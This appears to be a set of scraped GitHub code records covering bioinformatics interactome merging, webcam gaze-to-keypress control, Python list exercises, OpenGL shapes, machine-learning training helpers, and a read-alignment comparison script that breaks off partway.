string[string.columns[0]].map(string_mapper)\r\nstring[string.columns[1]] = string[string.columns[1]].map(string_mapper)\r\nstring.columns = [\"Interactor 1\", \"Interactor 2\", \"string_confidence\"]\r\nstring = string[string[\"string_confidence\"] > 700]\r\nstring[\"string_confidence\"] = np.array(string[\"string_confidence\"]) / 1000\r\nstring.dropna(inplace=True)\r\nstring.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\nstring.reset_index(drop=True, inplace=True)\r\n\r\n# Intact interactome (all human interactions used.)\r\nintact = pd.read_csv(\"raw_data/intact.txt\", usecols=[\"Alias(es) interactor A\", \"Alias(es) interactor B\",\r\n \"Taxid interactor A\", \"Taxid interactor B\",\r\n \"Confidence value(s)\"], delimiter=\"\\t\", low_memory=False)\r\nintact = intact[intact[\"Taxid interactor A\"] == \"taxid:9606(human)|taxid:9606(Homo sapiens)\"]\r\nintact = intact[intact[\"Taxid interactor B\"] == \"taxid:9606(human)|taxid:9606(Homo sapiens)\"]\r\nintact.drop([\"Taxid interactor A\", \"Taxid interactor B\"], axis=1, inplace=True)\r\nintact.columns = [\"Interactor 1\", \"Interactor 2\", \"intact_confidence\"]\r\nintact[\"intact_confidence\"] = np.array(intact[\"intact_confidence\"].apply(lambda x: x[-4:]), dtype=float)\r\nintact = intact[intact[\"Interactor 1\"].str.contains(\"(gene name)\")]\r\nintact = intact[intact[\"Interactor 2\"].str.contains(\"(gene name)\")]\r\nintact.reset_index(drop=True, inplace=True)\r\nintact[\"Interactor 1\"] = intact[\"Interactor 1\"].apply(lambda x: x.split(\"(gene name)\")[0].split(\"uniprotkb:\")[-1])\r\nintact[\"Interactor 2\"] = intact[\"Interactor 2\"].apply(lambda x: x.split(\"(gene name)\")[0].split(\"uniprotkb:\")[-1])\r\nintact.dropna(inplace=True)\r\nintact.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\nintact.reset_index(drop=True, inplace=True)\r\n\r\n# Hippie interactome (All human interactions used.)\r\nhippie = pd.read_csv(\"raw_data/hippie_current.txt\", delimiter=\"\\t\", header=None, usecols=[0, 2, 4],\r\n names=[\"Interactor 1\", \"Interactor 2\", \"iref_confidence\"], low_memory=False)\r\nhippie.columns = [\"Interactor 1\", \"Interactor 2\", \"hippie_confidence\"]\r\nhippie.dropna(inplace=True)\r\nhippie[\"Interactor 1\"] = hippie[\"Interactor 1\"].apply(lambda x: x.split(\"_\")[0])\r\nhippie[\"Interactor 2\"] = hippie[\"Interactor 2\"].apply(lambda x: x.split(\"_\")[0])\r\nhippie.dropna(inplace=True)\r\nhippie.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\nhippie.reset_index(drop=True, inplace=True)\r\n\r\n# OmniPath (All interactions are used.)\r\nomnipath = pd.read_csv(\"raw_data/AllInteractions.csv\", usecols=[\"source\", \"target\", \"is_directed\", \"is_stimulation\",\r\n \"is_inhibition\", \"consensus_direction\",\r\n \"consensus_stimulation\", \"consensus_inhibition\"],\r\n low_memory=False)\r\nomnipath_info = pd.read_csv(\"raw_data/idmapping_2023_07_11.tsv\", delimiter=\"\\t\", low_memory=False)\r\nomnipath_mapper = dict(zip(list(omnipath_info[\"From\"]), list(omnipath_info[\"To\"])))\r\nomnipath[omnipath.columns[0]] = omnipath[omnipath.columns[0]].map(omnipath_mapper)\r\nomnipath[omnipath.columns[1]] = omnipath[omnipath.columns[1]].map(omnipath_mapper)\r\nomnipath.dropna(inplace=True)\r\nomnipath.drop_duplicates([\"source\", \"target\"], inplace=True)\r\nomnipath.reset_index(drop=True, inplace=True)\r\nomni_directed = np.zeros(len(omnipath))\r\nfor i, row in omnipath.iterrows():\r\n if row[7] and not row[6]: # consensus inhibition.\r\n omni_directed[i] = int(-1)\r\n elif row[6] and not row[7]: # consensus stimulation.\r\n omni_directed[i] = int(1)\r\n elif row[6] and row[7]: # consensus conflict.\r\n if row[3] and not row[4]:\r\n omni_directed[i] = int(1) # stimulation\r\n elif row[4] and not row[3]:\r\n omni_directed[i] = int(-1) # repression\r\n\r\nomnipath[\"omni_directed\"] = omni_directed\r\nomnipath = omnipath[omnipath[\"omni_directed\"] != 0]\r\nomnipath.drop([\"is_directed\", \"is_stimulation\", \"is_inhibition\", \"consensus_direction\", \"consensus_stimulation\",\r\n \"consensus_inhibition\"], axis=1, inplace=True)\r\nomnipath.columns = [\"Interactor 1\", \"Interactor 2\", \"omni_directed\"]\r\n\r\n# TRRUST (All directed interactions used.)\r\ntrrust = pd.read_csv(\"raw_data/trrust_rawdata.human.tsv\", delimiter=\"\\t\", header=None, usecols=[0, 1, 2],\r\n low_memory=False)\r\ntrrust = trrust[trrust[2] != \"Unknown\"]\r\ntrrust.columns = [\"Interactor 1\", \"Interactor 2\", \"tr_directed\"]\r\ntrrust.dropna(inplace=True)\r\ntrrust.drop_duplicates([\"Interactor 1\", \"Interactor 2\"], inplace=True)\r\ntrrust.reset_index(drop=True, inplace=True)\r\ntrrust[trrust.columns[2]] = trrust[trrust.columns[2]].map({\"Repression\": -1, \"Activation\": 1})\r\n\r\n# Biogrid (Human interactions limited to (direct interaction), (physical association), (association).)\r\nbiogrid = pd.read_csv(\"raw_data/BIOGRID-ALL-4.4.223.mitab.txt\", delimiter=\"\\t\", usecols=[\"Alt IDs Interactor A\",\r\n \"Alt IDs Interactor B\",\r\n \"Taxid Interactor A\",\r\n \"Taxid Interactor B\",\r\n \"Interaction Types\"], low_memory=False)\r\n\r\nbiogrid = biogrid[biogrid[\"Taxid Interactor A\"] == \"taxid:9606\"]\r\nbiogrid = biogrid[biogrid[\"Taxid Interactor B\"] == \"taxid:9606\"]\r\nbiogrid = biogrid[(biogrid[\"Interaction Types\"] == 'psi-mi:\"MI:0407\"(direct interaction)') |\r\n (biogrid[\"Interaction Types\"] == 'psi-mi:\"MI:0915\"(physical association)') |\r\n (biogrid[\"Interaction Types\"] == 'psi-mi:\"MI:0914\"(association)')]\r\n\r\nbiogrid[\"Alt IDs Interactor B\"] = biogrid[\"Alt IDs Interactor B\"].apply(lambda x: x.split(\"locuslink:\")[1].split(\"|\")[0])\r\nbiogrid[\"Alt IDs Interactor A\"] = biogrid[\"Alt IDs Interactor A\"].apply(lambda x: x.split(\"locuslink:\")[1].split(\"|\")[0])\r\nbiogrid.drop([\"Taxid Interactor A\", \"Taxid Interactor B\", \"Interaction Types\"], axis=1, inplace=True)\r\nbiogrid.dropna(inplace=True)\r\nbiogrid.reset_index(drop=True, inplace=True)\r\nbiogrid.columns = [\"Interactor 1\", \"Interactor 2\"]\r\nbiogrid[\"BIOGRID\"] = np.array([True]*len(biogrid))\r\n\r\n# Pathways (Only KEGG and Wikipathways used)\r\npathways = pd.read_csv(\"raw_data/CPDB_pathways_genes.tab\", delimiter=\"\\t\", usecols=[\"external_id\", \"source\",\r\n \"hgnc_symbol_ids\"], low_memory=False)\r\npathways = pathways[(pathways[\"source\"] == \"KEGG\") | (pathways[\"source\"] == \"Wikipathways\")]\r\npathways_dict = {list(pathways[\"external_id\"])[i]: item.split(\",\") for i, item in enumerate(list(pathways[\"hgnc_symbol_ids\"]))}\r\n\r\n# Complexes (CORUM database used)\r\ncomplexes = pd.read_csv(\"raw_data/Complexes_has.csv\", low_memory=False)\r\ncomplexes_dict = {list(complexes[\"Complex_id\"])[i]: set(item.split(\";\")) for i, item in enumerate(list(complexes[\"Genes\"]))}\r\n\r\n# Merge All (All merged into one dataframe.)\r\nall_merged = iref.merge(string, how=\"outer\")\r\nall_merged = all_merged.merge(hippie, how=\"outer\")\r\nall_merged = all_merged.merge(intact, how=\"outer\")\r\nall_merged = all_merged.merge(omnipath, how=\"outer\")\r\nall_merged = all_merged.merge(trrust, how=\"outer\")\r\nall_merged = all_merged.merge(biogrid, how=\"outer\")\r\n\r\nall_merged.drop_duplicates(inplace=True)\r\nall_merged.reset_index(drop=True, inplace=True)\r\n\r\n# Pathway & Complex Annotation\r\nall_merged[\"pathway\"] = np.array([False]*len(all_merged))\r\nall_merged[\"complex\"] = np.array([False]*len(all_merged))\r\n\r\nfor genes in pathways_dict.values():\r\n all_merged.loc[(all_merged[\"Interactor 1\"].isin(genes)) & (all_merged[\"Interactor 2\"].isin(genes)), \"pathway\"] = True\r\n\r\nfor genes in complexes_dict.values():\r\n all_merged.loc[(all_merged[\"Interactor 1\"].isin(genes)) & (all_merged[\"Interactor 2\"].isin(genes)), \"complex\"] = True\r\n\r\nall_merged[\"BIOGRID\"] = all_merged[\"BIOGRID\"].fillna(False)\r\nall_merged = all_merged.fillna(0)\r\n\r\n# Advanced filtering: all directed kept, all transition rules applicable hippi high conf. kept)\r\nall_merged = all_merged[(all_merged[\"omni_directed\"] != 0) | (all_merged[\"tr_directed\"] != 0) |\r\n (((all_merged[\"pathway\"] == True) | (all_merged[\"complex\"] == True))\r\n & (all_merged[\"BIOGRID\"] == True) & (all_merged[\"hippie_confidence\"] > 0.83))]\r\n\r\n# Confidence values determined.\r\nall_merged[\"Confidence\"] = np.zeros(len(all_merged))\r\nfor i, row in all_merged.iterrows():\r\n if row[6] != 0 or row[7] != 0:\r\n if row[4] != 0:\r\n all_merged[\"Confidence\"].at[i] = row[4]\r\n elif row[2] != 0 or row[3] != 0 or row[5] != 0:\r\n all_merged[\"Confidence\"].at[i] = max(row[2], row[3], row[5])\r\n else:\r\n all_merged[\"Confidence\"].at[i] = 1\r\n elif row[4] != 0:\r\n all_merged[\"Confidence\"].at[i] = row[4]\r\n else:\r\n all_merged[\"Confidence\"].at[i] = max(row[2], row[3], row[5])\r\n\r\n# OmniPath prioritized in conflicting directionality. \r\nall_merged[\"is_directed\"] = list(all_merged[\"omni_directed\"])\r\nall_merged[\"is_directed\"] = [list(all_merged[\"tr_directed\"])[i] if element == 0 else element for i, element in enumerate(list(all_merged[\"omni_directed\"]))]\r\n\r\n# Extra columns dropped.\r\nall_merged.drop([\"iref_confidence\",\t\"string_confidence\", \"hippie_confidence\", \"intact_confidence\", \"omni_directed\",\r\n \"tr_directed\"], axis=1, inplace=True)\r\n\r\n\r\n# Remove self-edges and add the bidirected edges for undirected\r\nall_merged = all_merged[np.array(all_merged[\"Interactor 1\"]) != np.array(all_merged[\"Interactor 2\"])]\r\nintact.reset_index(drop=True, inplace=True)\r\nedges = set(zip(list(all_merged[\"Interactor 1\"]), list(all_merged[\"Interactor 2\"])))\r\nnew_df = pd.DataFrame(columns=all_merged.columns)\r\nfor i, row in all_merged.iterrows():\r\n if row[-1] == 0:\r\n if (row[1], row[0]) not in edges:\r\n new_row = row.copy()\r\n new_row[\"Interactor 1\"] = row[1]\r\n new_row[\"Interactor 2\"] = row[0]\r\n new_df = pd.concat([new_df, new_row.to_frame().T], ignore_index=True)\r\nall_merged = all_merged.merge(new_df, how=\"outer\")\r\nall_merged.to_csv(\"Reference.csv\", index=False)\r\n","repo_name":"EnesSefaAyar/Graph-based_Cellular_Automata","sub_path":"source/create_reference.py","file_name":"create_reference.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1898592701","text":"from __future__ import division\r\nimport cv2\r\nimport dlib\r\nimport pyautogui\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torchvision import datasets, models, transforms\r\nimport time\r\nimport os\r\nfrom PIL import Image\r\n\r\nLEFT_EYE_POINTS = [36, 37, 38, 39, 40, 41]\r\nRIGHT_EYE_POINTS = [42, 43, 44, 45, 46, 47]\r\n\r\najust = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\r\n])\r\n\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef concatenate(image1, image2):\r\n c1 = image1.shape\r\n c2 = image2.shape\r\n a1, b1 = c1[0], c1[1]\r\n a2, b2 = c2[0], c2[1]\r\n a = max(a1, a2)\r\n imagefinale = np.array([[[255, 255, 255]] * (b1 + b2)] * a)\r\n imagefinale.reshape((a, b1 + b2, 3))\r\n for k in range(a1):\r\n for p in range(b1):\r\n imagefinale[k][p] = image1[k][p]\r\n for j in range(a2):\r\n for i in range(b2):\r\n imagefinale[j][i + b1] = image2[j][i]\r\n return imagefinale\r\n\r\n\r\nwebcam = cv2.VideoCapture(0)\r\nface_detector = dlib.get_frontal_face_detector()\r\nfile_name = os.path.abspath('')\r\ncwd = os.path.abspath(file_name)\r\nmodel_path = os.path.abspath(os.path.join(cwd, \"gaze_tracking/trained_models/shape_predictor_68_face_landmarks.dat\"))\r\npredictor = dlib.shape_predictor(model_path)\r\nmargin = 10\r\n\r\nPATH_l = './modele_1oeuil.pth'\r\nmodel_l = models.resnet18(pretrained=True)\r\nnum_ftrs = model_l.fc.in_features\r\nmodel_l.fc = nn.Linear(num_ftrs, 9)\r\n\r\nmodel_l = model_l.to(device)\r\nmodel_l.load_state_dict(torch.load(PATH_l))\r\nmodel_l.eval()\r\n\r\nPATH_r = './modele_1oeuildroit.pth'\r\nmodel_r = models.resnet18(pretrained=True)\r\nnum_ftrs = model_r.fc.in_features\r\nmodel_r.fc = nn.Linear(num_ftrs, 9)\r\n\r\nmodel_r = model_r.to(device)\r\nmodel_r.load_state_dict(torch.load(PATH_r))\r\nmodel_r.eval()\r\n\r\nclass_names = ['bd', 'bg', 'bd', 'hd', 'hg', 'hm', 'md', 'mg', 'mm']\r\n\r\nwhile True:\r\n try:\r\n cpt_temps = 0\r\n results_l = torch.zeros([1, 9])\r\n results_r = torch.zeros([1, 9])\r\n while cpt_temps < 3:\r\n _, frame_o = webcam.read()\r\n frame = frame_o.copy()\r\n faces = face_detector(frame)\r\n landmarks = predictor(frame, faces[0])\r\n\r\n region_r = np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in RIGHT_EYE_POINTS])\r\n region_l = np.array([(landmarks.part(point).x, landmarks.part(point).y) for point in LEFT_EYE_POINTS])\r\n region_l = region_l.astype(np.int32)\r\n region_r = region_r.astype(np.int32)\r\n\r\n min_x_r = np.min(region_r[:, 0]) - margin\r\n max_x_r = np.max(region_r[:, 0]) + margin\r\n min_y_r = np.min(region_r[:, 1]) - margin\r\n max_y_r = np.max(region_r[:, 1]) + margin\r\n frame_r = frame[min_y_r:max_y_r, min_x_r:max_x_r]\r\n\r\n min_x_l = np.min(region_l[:, 0]) - margin\r\n max_x_l = np.max(region_l[:, 0]) + margin\r\n min_y_l = np.min(region_l[:, 1]) - margin\r\n max_y_l = np.max(region_l[:, 1]) + margin\r\n frame_l = frame[min_y_l:max_y_l, min_x_l:max_x_l]\r\n frame_c = concatenate(frame_l, frame_r)\r\n\r\n \"\"\"\r\n np.resize(frame_l, 256)\r\n image_l = torch.tensor(frame_l)\r\n torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(image_l)\r\n \r\n np.resize(frame_r, 256)\r\n image_r = torch.tensor(frame_r)\r\n torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(image_r)\r\n \"\"\"\r\n image_r = Image.fromarray(frame_r)\r\n image_l = Image.fromarray(frame_l)\r\n image_r = ajust(image_r)\r\n image_l = ajust(image_l)\r\n image_r.unsqueeze_(0)\r\n image_l.unsqueeze_(0)\r\n image_r = image_r.to(device)\r\n image_l = image_l.to(device)\r\n\r\n # image_c = ajust(frame_c)\r\n\r\n outputs_l = model_l(image_l) # on a un tenseur normalement\r\n results_l = results_l + outputs_l\r\n\r\n outputs_r = model_r(image_r) # on a un tenseur normalement\r\n results_r = results_r + outputs_r\r\n\r\n cpt_temps += 1\r\n\r\n _, preds = torch.max(results_r + results_l, 1)\r\n verdict = class_names[preds]\r\n\r\n if verdict == 'bg':\r\n pyautogui.keyDown('s')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('s')\r\n pyautogui.keyDown('q')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('q')\r\n # ♣pyautogui.alert('bg') # Make an alert box appear and pause the program until OK is clicked.\r\n if verdict == 'bd':\r\n pyautogui.keyDown('s')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('s')\r\n pyautogui.keyDown('d')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('d')\r\n if verdict == 'bm':\r\n pyautogui.keyDown('s')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('s')\r\n if verdict == 'md':\r\n pyautogui.keyDown('d')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('d')\r\n if verdict == 'mm':\r\n time.sleep(0.75)\r\n if verdict == 'mg':\r\n pyautogui.keyDown('q')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('q')\r\n if verdict == 'hg':\r\n pyautogui.keyDown('z')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('z')\r\n pyautogui.keyDown('q')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('q')\r\n if verdict == 'hd':\r\n pyautogui.keyDown('z')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('z')\r\n pyautogui.keyDown('d')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('d')\r\n if verdict == 'hm':\r\n pyautogui.keyDown('z')\r\n time.sleep(0.75)\r\n pyautogui.keyUp('z')\r\n # faire de meme pour les autres.\r\n\r\n except IndexError:\r\n ()\r\n if cv2.waitKey(1) == 27:\r\n break\r\n","repo_name":"ArnaudMi/MALIS_EyeTracking","sub_path":"MALIS/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26210882511","text":"# List Exercises\r\n\r\n'''\r\nReverse a given list in python\r\n'''\r\ninfo = ['karl', '100', 'Red', 'Mangoes']\r\ninfo.reverse()\r\nprint(info)\r\n\r\n\r\n'''\r\nWrite a program to add two lists index-wise.\r\nCreate a new list that contains the 0th index item from both the list,\r\nthen the 1st index item, and so on till the last element.\r\nany leftover items will get added at the end of the new list.\r\n'''\r\nlist1 = [\"M\", \"na\", \"i\", \"Ke\"]\r\nlist2 = [\"y\", \"me\", \"s\", \"lly\"]\r\nlist3 = [list1[i]+list2[i] for i in range(min(len(list1),len(list2)))]\r\nprint(list3)\r\n\r\n'''\r\nHint: use list comprehension with zip function\r\n'''\r\nlist1 = [\"M\", \"na\", \"i\", \"Ke\"]\r\nlist2 = [\"y\", \"me\", \"s\", \"lly\"]\r\nlist3 = [i+j for (i,j) in zip(list1, list2)]\r\nprint(list3)\r\nprint(' '.join(list3))\r\n\r\n\r\n\r\n'''\r\nWrite a Python program to find the second largest number in the given list.\r\n'''\r\nlist1 = [10, 20, 4]\r\nlist1.sort()\r\nprint(list1[-2])\r\n\r\n\r\n\r\n'''\r\nConcatenate two list\r\nHint: use list comprehension\r\n<<new_list>> = [expression for item in list1 for y in list2]\r\n'''\r\n\r\nlist1 = [\"Hello \", \"take \"]\r\nlist2 = [\"Dear\", \"Sir\"]\r\nresult = [x+y for x in list1 for y in list2]\r\nprint(result)\r\n\r\n\r\n'''\r\nWrite a program to find value 20 in the list,\r\nand if it is present, replace it with 200.\r\nOnly update the first occurrence of an item.\r\n'''\r\n\r\nlist1 = [5, 10, 15, 20, 25, 50, 20]\r\nres = [200 if i==20 else i for i in list1]\r\nprint(res)\r\n\r\n\r\n'''\r\ncount number of occurrences of x in the given list\r\n'''\r\n\r\nlst = [15, 6, 7, 10, 12, 20, 10, 28, 10]\r\nx = 10\r\nprint(lst.count(x))\r\n\r\n'''\r\nwrite a program to remove all occurrences of item 20\r\nHint: list comprehension\r\n'''\r\nlist1 = [5, 20, 15, 20, 25, 50, 20]\r\nlist1 = [i for i in list1 if i!=20]\r\nprint(list1)\r\n\r\n\r\n'''\r\nWrite a program to return the middle value of a list.\r\nIf there are 2 middle values, return the second\r\n'''\r\nage = [10, 3, 45, 67, 89.0, 45]\r\nres = age[len(age)//2]\r\nprint(res)","repo_name":"riseoptions/assignment1","sub_path":"RA_List_Exercise.py","file_name":"RA_List_Exercise.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37421640494","text":"from OpenGL.GL import *\n\n\nclass Objects2D: # base class for 2D-objects\n def __init__(self, xPos, yPos, color):\n self.xPos = xPos # store center x-position\n self.yPos = yPos # store center y-position\n self.R, self.G, self.B = color # unfold color tuple\n self.alpha = 1 # set transparency to none\n self._edges = list() # create list for edges\n self._vertices = list() # create list for vertices\n\n def update(self): # update drawing of 2D-object\n glBegin(GL_LINES) # draw lines, only\n for edge in self._edges: # iterate all edges\n for vertex in edge: # iterate all vertices to draw\n glColor4f(self.R, self.G, self.B, self.alpha) # red,green,blue,alpha\n glVertex3fv(self._vertices[vertex])\n glEnd() # End of definition\n\n\nclass Square(Objects2D): # subclass to define 2D-squares\n def __init__(self, xPos = 0, yPos = 0, color = (1, 1, 1), size = 1):\n Objects2D.__init__(self, xPos, yPos, color) # call base class constructor\n self.__size = size # store size (for later use!?)\n dx = dy = size / 2 # to set square to the center\n self._vertices = [(xPos - dx, yPos - dy, 0), (xPos + dx, yPos - dy, 0),\n (xPos + dx, yPos + dy, 0), (xPos - dx, yPos + dy, 0)]\n self._edges = [(0, 1), (1, 2), (2, 3), (3, 0)]","repo_name":"Meschr/PythonAufgaben","sub_path":"Uebung5/Objects2D.py","file_name":"Objects2D.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18722143154","text":"from sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\nfrom sklearn.externals import joblib\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.optimizers import SGD\n\ndef linearRegression(X, Y):\n alg = LinearRegression();\n alg.fit(X, Y)\n joblib.dump(alg, 'model/linear_regression.pkl')\ndef logisticRegression(X, Y):\n alg = LogisticRegression(random_state=1)\n alg.fit(X, Y)\n joblib.dump(alg, 'model/logistic_regression.pkl')\ndef gradientboostingClassifier(X, Y):\n alg = GradientBoostingClassifier(random_state=1, n_estimators=25, max_depth=3)\n alg.fit(X, Y)\n joblib.dump(alg, 'model/gradient_boosting_classifier.pkl')\ndef svmClassifier(X, Y):\n alg = svm.SVC()\n alg.fit(X, Y)\n joblib.dump(alg, 'model/svm_classifier.pkl')\ndef randomforestClassifier(X, Y):\n alg = RandomForestClassifier(n_estimators=10)\n alg.fit(X, Y)\n joblib.dump(alg, 'model/random_forest_classifier.pkl')\ndef neuralNetwork(X, Y):\n model = Sequential()\n model.add(Dense(891, input_dim=9, init='uniform', activation='relu'))\n #model.add(Dropout(0.5))\n model.add(Dense(9, init='uniform', activation='relu'))\n #model.add(Dropout(0.5))\n model.add(Dense(1, init='uniform', activation='sigmoid'))\n model.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n X_train = X.as_matrix()\n Y_train = Y.as_matrix()\n model.fit(X_train, Y_train, nb_epoch=70, batch_size=10)\n model.save('model/neural_networks.h5')\n","repo_name":"rajeshwarg/kaggle-competitions","sub_path":"Titanic/assignment/scripts/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19851165744","text":"import torch\nimport torch.nn as nn\nimport copy\n\n\nclass Phead_with_pseudo(nn.Module):\n def __init__(self, net, dim_in=2048,hidden_mlp=2048, pred_dim=512, pseudo=3000):\n super().__init__()\n # self.net = nn.Sequential(*list(net.children())[:-1])\n self.net = net\n self.projection_head = nn.Sequential(\n nn.Linear(dim_in, hidden_mlp,bias=False),\n nn.BatchNorm1d(hidden_mlp),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_mlp, hidden_mlp,bias=False),\n nn.BatchNorm1d(hidden_mlp),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_mlp, pseudo),\n nn.BatchNorm1d(pseudo, affine=False)\n )\n self.pfc = nn.Sequential(\n nn.Linear(pseudo, pred_dim, bias=False),\n nn.BatchNorm1d(pred_dim),\n nn.ReLU(inplace=True), # hidden layer\n nn.Linear(pred_dim, pseudo)) # output layer\n \n\n def forward(self, x):\n feat = self.net(x)\n emb = self.projection_head(feat)\n\n py = self.pfc(emb)\n \n return emb,py\n\n\nclass Phead(nn.Module):\n def __init__(self, net, dim_in=2048, dim_feat=128,hidden_mlp=2048, dim_out=1000):\n super().__init__()\n self.net = net\n self.projection_head = nn.Sequential(\n nn.Linear(dim_in, hidden_mlp),\n nn.BatchNorm1d(hidden_mlp),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_mlp, dim_feat),\n )\n\n\n self.fc = nn.Linear(dim_feat, dim_out)\n\n\n def forward(self, x):\n feat = self.net(x)\n emb = self.projection_head(feat)\n y = self.fc(emb)\n return y","repo_name":"Zoe-Wan/clusterSSL","sub_path":"src/Phead.py","file_name":"Phead.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18668205905","text":"'''\nCompares a diploid-to-diploid sam and \nchecks if the multi-mapped regions are \nidentical in two personalized refs\n'''\nimport argparse, math, sys, os\nimport pandas as pd\n# from analyze_sam import SamInfo, parse_line, load_golden_dic, Summary\nfrom lib_compare_sam import SamInfo, parse_line, load_golden_dic, Summary, print_df_stats\nfrom build_erg import read_var, read_genome\nimport constants\n\n#: TODO LEV should support different scoring schemes\nfrom get_levenshtein import levenshtein\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-n', '--sam',\n help='target sam file'\n )\n parser.add_argument(\n '-g', '--golden',\n help='golden sam file'\n )\n parser.add_argument(\n '-vr', '--var_reads',\n help='the file specifying variants for the synthetic reads'\n )\n parser.add_argument(\n '-vs', '--var_sample',\n help='the file specifying variants for the current target reference'\n )\n parser.add_argument(\n '-p', '--personalized', type=int,\n default=0,\n help='(int) specify whether the ref seq(s) are standard (0) or personalized-diploid (2) sample [0]'\n )\n parser.add_argument(\n '-c', '--chrom',\n help='(str) chromosome [None]'\n )\n parser.add_argument(\n '-t', '--threshold', type=int,\n default=10,\n help='(int) max allowed distance for a correct mapping [10]'\n )\n parser.add_argument(\n '--read_len', type=int,\n default=100,\n help='(int) read length [100]'\n )\n parser.add_argument(\n '--step_size', type=int,\n default=1000,\n help='(int) the step size for main/alt offset indexes [1000]'\n )\n parser.add_argument(\n '--write_wrt_correctness',\n action='store_true',\n #default=None,\n help='(int) If set, writes two files recording correct/incorrect alignments respectively. The output files use target sam prefix [None].'\n )\n parser.add_argument(\n '--debug_ref',\n help='reference fasta for debug purpose [None]'\n )\n parser.add_argument(\n '--debug_hapA',\n help='hapA fasta for debug purpose [None]'\n )\n parser.add_argument(\n '--debug_hapB',\n help='hapB fasta for debug purpose [None]'\n )\n args = parser.parse_args()\n return args\n\ndef build_index(var_list):\n '''\n Reads var_list and maps variants from hapA/B to the reference coordinate\n \n SHOW_MULT:\n A MULT here can be an ALT locus, such as \n A 9 INDEL 10362 10362 C CT\n B 9 INDEL 10362 10362 C CT\n or a multi-allelic locus, such as\n A 9 SNP 121398204 121393883 A C\n B 9 SNP 121398204 121393566 A T\n '''\n SHOW_MULT = False\n main_index = {}\n alt_index = {}\n for v in var_list:\n pos = v.alt_pos\n c_pos = v.ref_pos + v.cor_offset\n if v.strand == constants.MAIN_STRAND:\n if SHOW_MULT:\n if main_index.get(pos):\n print (pos, main_index[pos])\n print (v.line)\n if alt_index.get(c_pos):\n print (c_pos, alt_index[c_pos])\n print (v.line)\n for i in range(pos, pos + len(v.alt_allele)):\n main_index[i] = [v.ref_pos, v.vtype, v.ref_allele, v.alt_allele]\n else:\n if SHOW_MULT:\n if main_index.get(c_pos):\n print (c_pos, main_index[c_pos])\n print (v.line)\n if alt_index.get(pos):\n print (pos, alt_index[pos])\n print (v.line)\n for i in range(pos, pos + len(v.alt_allele)):\n alt_index[i] = [v.ref_pos, v.vtype, v.ref_allele, v.alt_allele]\n return main_index, alt_index\n\ndef build_offset_index(var_list):\n # , step, MAIN_STRAND, ALT_STRAND):\n '''\n CURRENTLY UNUSED\n \n MAIN/ALT-offset indexes are dictionaries with\n key: pos on MAIN/ALT\n value: pos on ALT/MAIN\n \n MAIN/ALT indexes are dictionaries storing\n variants based on MAIN/ALT coordinates\n '''\n #: dict storing the diff from main to alt\n #: main_pos + main_offset_index[i] = alt_pos\n main_offset_index = [0]\n #: dict storing the diff from alt to main\n #: alt_pos + alt_offset_index[i] = main_pos\n alt_offset_index = [0]\n SHOW_DUP_WARN = False\n tmp_v = 0\n for v in var_list:\n if v.strand == constants.MAIN_STRAND:\n main_pos = v.alt_pos\n alt_pos = v.ref_pos + v.cor_offset\n main_offset = -v.offset + v.cor_offset\n alt_offset = v.offset - v.cor_offset\n if v.ref_pos == tmp_v:\n if SHOW_DUP_WARN:\n print ('Warning: duplicated variant', v.line)\n tmp_v = v.ref_pos\n elif v.strand == constants.ALT_STRAND:\n main_pos = v.ref_pos + v.cor_offset\n alt_pos = v.alt_pos\n main_offset = v.offset - v.cor_offset\n alt_offset = -v.offset + v.cor_offset\n else:\n print ('Error: unspecified strand', v.strand)\n exit()\n \n i_main = math.ceil(main_pos / constants.STEP)\n while i_main >= len(main_offset_index):\n main_offset_index.append(main_offset_index[len(main_offset_index) - 1])\n main_offset_index[i_main] = main_offset\n i_alt = 